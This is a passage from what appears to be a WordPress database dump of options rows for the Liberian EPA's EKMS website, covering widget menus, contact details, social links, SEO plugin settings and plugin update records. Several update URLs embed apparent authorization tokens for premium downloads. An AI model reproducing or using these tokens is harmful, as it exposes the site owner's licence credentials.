08:40:51\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:3758;N;i:3766;N;i:3754;N;i:3757;O:13:\"FS_Plugin_Tag\":12:{s:7:\"version\";s:5:\"2.0.2\";s:3:\"url\";s:385:\"http://api.freemius.com/v1/installs/3394789/updates/32320.zip?is_premium=true&authorization=FSLA+3394789%3ALRjjxhAy0noKeO3WZvDAwsXBRtyGsHFC24nntzFq3J4FwbAlsCEInVFdwGG1w1dP8bXnF-ADzRzyWEaEWiu7Nr2dzrFIG2Gzbuy8DAOTK_dSnAW4jmebxG50Fa058amgtoM8DcgG6An7-IyKnQKVY9mfNbbisVrs82ZIoZn8ERaKf52_wDCx5GvyIUTCdFvBZt0jlFIA0YomKvtVPkdyE4m3sbLds0a6Z_PEX4nb7BdvJEjA-b6KsyXGHVWbrq42AU3j2-igLJwLT_7Ve8UekQ\";s:25:\"requires_platform_version\";s:3:\"5.3\";s:37:\"requires_programming_language_version\";N;s:20:\"tested_up_to_version\";s:3:\"5.8\";s:8:\"has_free\";b:0;s:11:\"has_premium\";b:1;s:12:\"release_mode\";s:8:\"released\";s:2:\"id\";s:5:\"32320\";s:7:\"updated\";i:1629113547;s:7:\"created\";s:19:\"2021-07-22 12:26:44\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:3765;O:13:\"FS_Plugin_Tag\":12:{s:7:\"version\";s:5:\"2.0.1\";s:3:\"url\";s:385:\"http://api.freemius.com/v1/installs/3394810/updates/32275.zip?is_premium=true&authorization=FSLA+3394810%3AELNYi3P2imHpehQXpPBz1wOq8g0J29MjOtdWuhjB_KrtkvuLjsaQUJiS-29ycJSpCbjfXAu-kfopHQnG3fKgIjXRkXq8z8aEsnhW3_qhjoctTkZyOpRrjBZq0GT8lieh_U0BJ66z-tRSfFvAypZE2Ohlw2BE0btV1TDUXYxNw7sN53zBlFDja5ejQ5UKBmsB24dlUMDBFH2VzH_g0PbMnk4hHKq54MlhKAbC5Wgkc9n_r7mXileOfkrZQqR_u4SojjSa1Z7zdIPYVhspOHiNsg\";s:25:\"requires_platform_version\";s:3:\"5.3\";s:37:\"requires_programming_language_version\";N;s:20:\"tested_up_to_version\";s:3:\"5.8\";s:8:\"has_free\";b:0;s:11:\"has_premium\";b:1;s:12:\"release_mode\";s:8:\"released\";s:2:\"id\";s:5:\"32275\";s:7:\"updated\";i:1629113547;s:7:\"created\";s:19:\"2021-07-21 10:48:10\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}i:3797;N;}}','yes'),(257,'fs_gdpr','a:4:{s:2:\"u1\";a:2:{s:8:\"required\";b:0;s:18:\"show_opt_in_notice\";b:0;}s:3:\"u42\";a:1:{s:8:\"required\";b:0;}s:3:\"u43\";a:1:{s:8:\"required\";b:0;}s:2:\"u0\";a:1:{s:8:\"required\";b:0;}}','yes'),(258,'widget_ocean_about_me','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(259,'widget_ocean_contact_info','a:2:{i:1;a:29:{s:5:\"title\";s:12:\"Contact Info\";s:4:\"text\";s:80:\"The EKMS Committee<br>\r\nEnvironmental Protection Agency<br>\r\nRepublic of Liberia\";s:12:\"address_icon\";s:17:\"icon-location-pin\";s:12:\"address_text\";s:8:\"Address:\";s:7:\"address\";s:18:\"4th Street, Sinkor\";s:10:\"phone_icon\";s:10:\"icon-phone\";s:10:\"phone_text\";s:6:\"Phone:\";s:5:\"phone\";s:0:\"\";s:11:\"mobile_icon\";s:22:\"icon-screen-smartphone\";s:11:\"mobile_text\";s:7:\"Mobile:\";s:6:\"mobile\";s:0:\"\";s:8:\"fax_icon\";s:12:\"icon-printer\";s:8:\"fax_text\";s:4:\"Fax:\";s:3:\"fax\";s:0:\"\";s:10:\"email_icon\";s:13:\"icon-envelope\";s:10:\"email_text\";s:6:\"Email:\";s:5:\"email\";s:24:\"contact@ekmsliberia.info\";s:8:\"emailtxt\";s:24:\"contact@ekmsliberia.info\";s:8:\"web_icon\";s:9:\"icon-link\";s:8:\"web_text\";s:8:\"Website:\";s:3:\"web\";s:0:\"\";s:6:\"webtxt\";s:0:\"\";s:5:\"skype\";s:0:\"\";s:8:\"skypetxt\";s:0:\"\";s:5:\"style\";s:7:\"default\";s:6:\"target\";s:4:\"self\";s:12:\"address_link\";s:0:\"\";s:10:\"phone_link\";s:0:\"\";s:11:\"mobile_link\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(260,'widget_ocean_custom_links','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(261,'widget_ocean_custom_menu','a:24:{i:3;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"120\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:4;a:12:{s:5:\"title\";s:21:\"Existing Data Systems\";s:8:\"nav_menu\";s:3:\"133\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:5;a:12:{s:5:\"title\";s:12:\"Useful Links\";s:8:\"nav_menu\";s:3:\"134\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:6;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"121\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:7;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"135\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:8;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"137\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:9;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"136\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:10;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"139\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:11;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"138\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:12;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"140\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:13;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"141\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:14;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"167\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:15;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"142\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:16;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"179\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:17;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"180\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:18;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"181\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:19;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"182\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:20;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"183\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:21;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"184\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:22;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"185\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:23;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"186\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:24;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"187\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}i:25;a:12:{s:5:\"title\";s:5:\"Links\";s:8:\"nav_menu\";s:3:\"211\";s:8:\"position\";s:4:\"left\";s:8:\"dropdown\";s:5:\"hover\";s:6:\"target\";s:4:\"icon\";s:11:\"nav_padding\";s:0:\"\";s:14:\"nav_link_color\";s:4:\"#555\";s:20:\"nav_link_hover_color\";s:4:\"#333\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"20\";s:14:\"letter_spacing\";s:3:\"0.6\";s:14:\"text_transform\";s:7:\"default\";}s:12:\"_multiwidget\";i:1;}','yes'),(262,'widget_ocean_facebook','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(263,'widget_ocean_flickr','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(264,'widget_ocean_instagram','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(265,'widget_ocean_mailchimp','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(266,'widget_ocean_recent_posts','a:2:{i:2;a:7:{s:5:\"title\";s:14:\"Latest Uploads\";s:9:\"post_type\";s:8:\"document\";s:8:\"taxonomy\";s:8:\"category\";s:5:\"terms\";s:0:\"\";s:6:\"number\";s:1:\"4\";s:5:\"order\";s:4:\"DESC\";s:7:\"orderby\";s:4:\"date\";}s:12:\"_multiwidget\";i:1;}','yes'),(267,'widget_ocean_social','a:2:{i:2;a:15:{s:5:\"title\";s:9:\"Follow Us\";s:5:\"style\";s:5:\"light\";s:10:\"transition\";s:13:\"no-transition\";s:6:\"target\";s:5:\"blank\";s:4:\"size\";s:4:\"48px\";s:13:\"border_radius\";s:3:\"50%\";s:9:\"font_size\";s:0:\"\";s:15:\"social_services\";a:20:{s:8:\"facebook\";a:2:{s:4:\"name\";s:8:\"Facebook\";s:3:\"url\";s:85:\"https://www.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";}s:7:\"twitter\";a:2:{s:4:\"name\";s:7:\"Twitter\";s:3:\"url\";s:31:\"https://twitter.com/EkmsLiberia\";}s:9:\"instagram\";a:2:{s:4:\"name\";s:9:\"Instagram\";s:3:\"url\";s:38:\"https://www.instagram.com/ekmsliberia/\";}s:11:\"google-plus\";a:2:{s:4:\"name\";s:10:\"GooglePlus\";s:3:\"url\";s:0:\"\";}s:8:\"linkedin\";a:2:{s:4:\"name\";s:8:\"LinkedIn\";s:3:\"url\";s:0:\"\";}s:9:\"pinterest\";a:2:{s:4:\"name\";s:9:\"Pinterest\";s:3:\"url\";s:0:\"\";}s:4:\"yelp\";a:2:{s:4:\"name\";s:4:\"Yelp\";s:3:\"url\";s:0:\"\";}s:8:\"dribbble\";a:2:{s:4:\"name\";s:8:\"Dribbble\";s:3:\"url\";s:0:\"\";}s:6:\"flickr\";a:2:{s:4:\"name\";s:6:\"Flickr\";s:3:\"url\";s:0:\"\";}s:2:\"vk\";a:2:{s:4:\"name\";s:2:\"VK\";s:3:\"url\";s:0:\"\";}s:6:\"github\";a:2:{s:4:\"name\";s:6:\"GitHub\";s:3:\"url\";s:0:\"\";}s:6:\"tumblr\";a:2:{s:4:\"name\";s:6:\"Tumblr\";s:3:\"url\";s:0:\"\";}s:5:\"skype\";a:2:{s:4:\"name\";s:5:\"Skype\";s:3:\"url\";s:0:\"\";}s:6:\"trello\";a:2:{s:4:\"name\";s:6:\"Trello\";s:3:\"url\";s:0:\"\";}s:10:\"foursquare\";a:2:{s:4:\"name\";s:10:\"Foursquare\";s:3:\"url\";s:0:\"\";}s:4:\"xing\";a:2:{s:4:\"name\";s:4:\"Xing\";s:3:\"url\";s:0:\"\";}s:12:\"vimeo-square\";a:2:{s:4:\"name\";s:5:\"Vimeo\";s:3:\"url\";s:0:\"\";}s:4:\"vine\";a:2:{s:4:\"name\";s:4:\"Vine\";s:3:\"url\";s:0:\"\";}s:7:\"youtube\";a:2:{s:4:\"name\";s:7:\"Youtube\";s:3:\"url\";s:0:\"\";}s:3:\"rss\";a:2:{s:4:\"name\";s:3:\"RSS\";s:3:\"url\";s:0:\"\";}}s:8:\"bg_color\";s:0:\"\";s:14:\"bg_hover_color\";s:0:\"\";s:5:\"color\";s:0:\"\";s:11:\"color_hover\";s:0:\"\";s:12:\"border_color\";s:0:\"\";s:18:\"border_hover_color\";s:0:\"\";s:8:\"nofollow\";s:2:\"no\";}s:12:\"_multiwidget\";i:1;}','yes'),(268,'widget_ocean_social_share','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(269,'widget_ocean_tags','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(270,'widget_ocean_twitter','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(271,'widget_ocean_video','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(272,'widget_ocean_custom_header_logo','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(273,'widget_ocean_custom_header_nav','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(275,'rank_math_search_console_data','a:2:{s:10:\"authorized\";b:0;s:8:\"profiles\";a:0:{}}','yes'),(276,'rank_math_known_post_types','a:5:{s:4:\"post\";s:4:\"post\";s:4:\"page\";s:4:\"page\";s:10:\"attachment\";s:10:\"attachment\";s:17:\"elementor_library\";s:17:\"elementor_library\";s:12:\"elementor-hf\";s:12:\"elementor-hf\";}','yes'),(277,'rank_math_modules','a:7:{i:0;s:12:\"link-counter\";i:1;s:14:\"search-console\";i:2;s:12:\"seo-analysis\";i:3;s:7:\"sitemap\";i:4;s:12:\"rich-snippet\";i:5;s:11:\"woocommerce\";i:6;s:3:\"acf\";}','yes'),(278,'rank-math-options-general','a:41:{s:19:\"strip_category_base\";s:3:\"off\";s:24:\"attachment_redirect_urls\";s:2:\"on\";s:27:\"attachment_redirect_default\";s:24:\"https://ekmsliberia.info\";s:19:\"url_strip_stopwords\";s:3:\"off\";s:23:\"nofollow_external_links\";s:3:\"off\";s:20:\"nofollow_image_links\";s:3:\"off\";s:25:\"new_window_external_links\";s:2:\"on\";s:11:\"add_img_alt\";s:3:\"off\";s:14:\"img_alt_format\";s:20:\"%title% %count(alt)%\";s:13:\"add_img_title\";s:3:\"off\";s:16:\"img_title_format\";s:22:\"%title% %count(title)%\";s:11:\"breadcrumbs\";s:3:\"off\";s:21:\"breadcrumbs_separator\";s:1:\"-\";s:16:\"breadcrumbs_home\";s:2:\"on\";s:22:\"breadcrumbs_home_label\";s:4:\"Home\";s:26:\"breadcrumbs_archive_format\";s:15:\"Archives for %s\";s:25:\"breadcrumbs_search_format\";s:14:\"Results for %s\";s:21:\"breadcrumbs_404_label\";s:25:\"404 Error: page not found\";s:31:\"breadcrumbs_ancestor_categories\";s:3:\"off\";s:21:\"breadcrumbs_blog_page\";s:3:\"off\";s:16:\"404_monitor_mode\";s:6:\"simple\";s:17:\"404_monitor_limit\";i:100;s:35:\"404_monitor_ignore_query_parameters\";s:2:\"on\";s:24:\"redirections_header_code\";s:3:\"301\";s:18:\"redirections_debug\";s:3:\"off\";s:15:\"console_profile\";s:0:\"\";s:23:\"console_caching_control\";s:2:\"90\";s:27:\"link_builder_links_per_page\";s:1:\"7\";s:29:\"link_builder_links_per_target\";s:1:\"1\";s:22:\"wc_remove_product_base\";s:3:\"off\";s:23:\"wc_remove_category_base\";s:3:\"off\";s:31:\"wc_remove_category_parent_slugs\";s:3:\"off\";s:18:\"rss_before_content\";s:0:\"\";s:17:\"rss_after_content\";s:0:\"\";s:14:\"usage_tracking\";s:3:\"off\";s:19:\"wc_remove_generator\";s:2:\"on\";s:24:\"remove_shop_snippet_data\";s:2:\"on\";s:18:\"frontend_seo_score\";s:3:\"off\";s:29:\"frontend_seo_score_post_types\";a:1:{i:0;s:4:\"post\";}s:27:\"frontend_seo_score_position\";s:3:\"top\";s:18:\"enable_auto_update\";s:3:\"off\";}','yes'),(279,'rank-math-options-titles','a:110:{s:24:\"noindex_empty_taxonomies\";s:2:\"on\";s:15:\"title_separator\";s:1:\"-\";s:17:\"capitalize_titles\";s:3:\"off\";s:17:\"twitter_card_type\";s:19:\"summary_large_image\";s:19:\"knowledgegraph_type\";s:6:\"person\";s:19:\"knowledgegraph_name\";s:0:\"\";s:19:\"local_business_type\";s:12:\"Organization\";s:20:\"local_address_format\";s:43:\"{address} {locality}, {region} {postalcode}\";s:13:\"opening_hours\";a:7:{i:0;a:2:{s:3:\"day\";s:6:\"Monday\";s:4:\"time\";s:11:\"09:00-17:00\";}i:1;a:2:{s:3:\"day\";s:7:\"Tuesday\";s:4:\"time\";s:11:\"09:00-17:00\";}i:2;a:2:{s:3:\"day\";s:9:\"Wednesday\";s:4:\"time\";s:11:\"09:00-17:00\";}i:3;a:2:{s:3:\"day\";s:8:\"Thursday\";s:4:\"time\";s:11:\"09:00-17:00\";}i:4;a:2:{s:3:\"day\";s:6:\"Friday\";s:4:\"time\";s:11:\"09:00-17:00\";}i:5;a:2:{s:3:\"day\";s:8:\"Saturday\";s:4:\"time\";s:11:\"09:00-17:00\";}i:6;a:2:{s:3:\"day\";s:6:\"Sunday\";s:4:\"time\";s:11:\"09:00-17:00\";}}s:20:\"opening_hours_format\";s:3:\"off\";s:14:\"homepage_title\";s:34:\"%sitename% %page% %sep% %sitedesc%\";s:20:\"homepage_description\";s:0:\"\";s:22:\"homepage_custom_robots\";s:3:\"off\";s:23:\"disable_author_archives\";s:3:\"off\";s:15:\"url_author_base\";s:6:\"author\";s:20:\"author_custom_robots\";s:2:\"on\";s:13:\"author_robots\";a:1:{i:0;s:7:\"noindex\";}s:20:\"author_archive_title\";s:30:\"%name% %sep% %sitename% %page%\";s:19:\"author_add_meta_box\";s:2:\"on\";s:21:\"disable_date_archives\";s:3:\"off\";s:18:\"date_archive_title\";s:30:\"%date% %page% %sep% %sitename%\";s:12:\"search_title\";s:38:\"%search_query% %page% %sep% %sitename%\";s:9:\"404_title\";s:31:\"Page Not Found %sep% %sitename%\";s:19:\"date_archive_robots\";a:1:{i:0;s:7:\"noindex\";}s:14:\"noindex_search\";s:2:\"on\";s:24:\"noindex_archive_subpages\";s:3:\"off\";s:26:\"noindex_password_protected\";s:3:\"off\";s:13:\"pt_post_title\";s:24:\"%title% %sep% %sitename%\";s:19:\"pt_post_description\";s:9:\"%excerpt%\";s:14:\"pt_post_robots\";a:0:{}s:21:\"pt_post_custom_robots\";s:3:\"off\";s:28:\"pt_post_default_rich_snippet\";s:7:\"article\";s:28:\"pt_post_default_article_type\";s:11:\"BlogPosting\";s:28:\"pt_post_default_snippet_name\";s:7:\"%title%\";s:28:\"pt_post_default_snippet_desc\";s:9:\"%excerpt%\";s:17:\"pt_post_ls_use_fk\";s:6:\"titles\";s:20:\"pt_post_add_meta_box\";s:2:\"on\";s:20:\"pt_post_bulk_editing\";s:7:\"editing\";s:24:\"pt_post_link_suggestions\";s:2:\"on\";s:24:\"pt_post_primary_taxonomy\";s:8:\"category\";s:13:\"pt_page_title\";s:24:\"%title% %sep% %sitename%\";s:19:\"pt_page_description\";s:9:\"%excerpt%\";s:14:\"pt_page_robots\";a:0:{}s:21:\"pt_page_custom_robots\";s:3:\"off\";s:28:\"pt_page_default_rich_snippet\";s:7:\"article\";s:28:\"pt_page_default_article_type\";s:7:\"Article\";s:28:\"pt_page_default_snippet_name\";s:7:\"%title%\";s:28:\"pt_page_default_snippet_desc\";s:9:\"%excerpt%\";s:17:\"pt_page_ls_use_fk\";s:6:\"titles\";s:20:\"pt_page_add_meta_box\";s:2:\"on\";s:20:\"pt_page_bulk_editing\";s:7:\"editing\";s:24:\"pt_page_link_suggestions\";s:2:\"on\";s:19:\"pt_attachment_title\";s:24:\"%title% %sep% %sitename%\";s:25:\"pt_attachment_description\";s:9:\"%excerpt%\";s:20:\"pt_attachment_robots\";a:1:{i:0;s:7:\"noindex\";}s:27:\"pt_attachment_custom_robots\";s:2:\"on\";s:34:\"pt_attachment_default_rich_snippet\";s:3:\"off\";s:34:\"pt_attachment_default_article_type\";s:7:\"Article\";s:34:\"pt_attachment_default_snippet_name\";s:7:\"%title%\";s:34:\"pt_attachment_default_snippet_desc\";s:9:\"%excerpt%\";s:26:\"pt_attachment_add_meta_box\";s:3:\"off\";s:26:\"pt_elementor_library_title\";s:24:\"%title% %sep% %sitename%\";s:32:\"pt_elementor_library_description\";s:9:\"%excerpt%\";s:27:\"pt_elementor_library_robots\";a:0:{}s:34:\"pt_elementor_library_custom_robots\";s:3:\"off\";s:41:\"pt_elementor_library_default_rich_snippet\";s:3:\"off\";s:41:\"pt_elementor_library_default_article_type\";s:7:\"Article\";s:41:\"pt_elementor_library_default_snippet_name\";s:7:\"%title%\";s:41:\"pt_elementor_library_default_snippet_desc\";s:9:\"%excerpt%\";s:30:\"pt_elementor_library_ls_use_fk\";s:6:\"titles\";s:33:\"pt_elementor_library_add_meta_box\";s:2:\"on\";s:33:\"pt_elementor_library_bulk_editing\";s:7:\"editing\";s:37:\"pt_elementor_library_link_suggestions\";s:2:\"on\";s:21:\"pt_elementor-hf_title\";s:24:\"%title% %sep% 